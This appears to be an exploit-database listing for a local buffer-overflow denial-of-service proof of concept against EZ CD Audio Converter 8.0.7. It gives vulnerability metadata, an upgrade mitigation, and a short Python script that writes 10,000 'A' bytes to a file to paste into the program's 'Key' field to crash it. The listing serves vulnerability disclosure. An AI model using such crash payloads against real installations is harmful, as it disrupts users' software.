EZ CD Audio Converter 8.0.7 - Denial of Service (PoC)

vendor:

EZ CD Audio Converter

by:

Achilles

7.8

CVSS

HIGH

Denial of Service (DoS) Local Buffer Overflow

119

CWE

Product Name: EZ CD Audio Converter

Affected Version From: 8.0.7

Affected Version To: 8.0.7

Patch Exists: YES

Related CWE: N/A

CPE: a:poikosoft:ez_cd_audio_converter

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 x64

2018

EZ CD Audio Converter 8.0.7 – Denial of Service (PoC)

EZ CD Audio Converter 8.0.7 is vulnerable to a Denial of Service (DoS) attack due to a Local Buffer Overflow. The vulnerability can be triggered by running a python code that creates a file with a malicious payload of 10000 bytes, copying the content of the file to the clipboard, opening the EZ CD Audio Converter application, pasting the content of the file into the 'Key' field, and then observing a crash.

Mitigation:

Upgrade to the latest version of EZ CD Audio Converter

Source

Exploit-DB raw data:

# Exploit Title: EZ CD Audio Converter 8.0.7 - Denial of Service (PoC)
# Date: 2018-12-30
# Exploit Author: Achilles
# Vendor Homepage: https://www.poikosoft.com/
# Software Link : https://download.poikosoft.com/ez_cd_audio_converter_setup_x64.exe
# Exploit Author: Achilles
# Tested Version: 8.0.7 (64-bit)
# Tested on: Windows 7 x64
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
# Steps to Produce the Crash:=20
# 1.- Run python code : EZ_CD_Audio_Converter.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open EZ_CD_Audio_Converter 'Press Activate'
# 4.- Paste the content of EVIL.txt into the field: 'Key'
# 5.- And you will see a crash.

#!/usr/bin/env python

buffer = "\x41" * 10000

try:
	f=open("Evil.txt","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except:
	print "File cannot be created"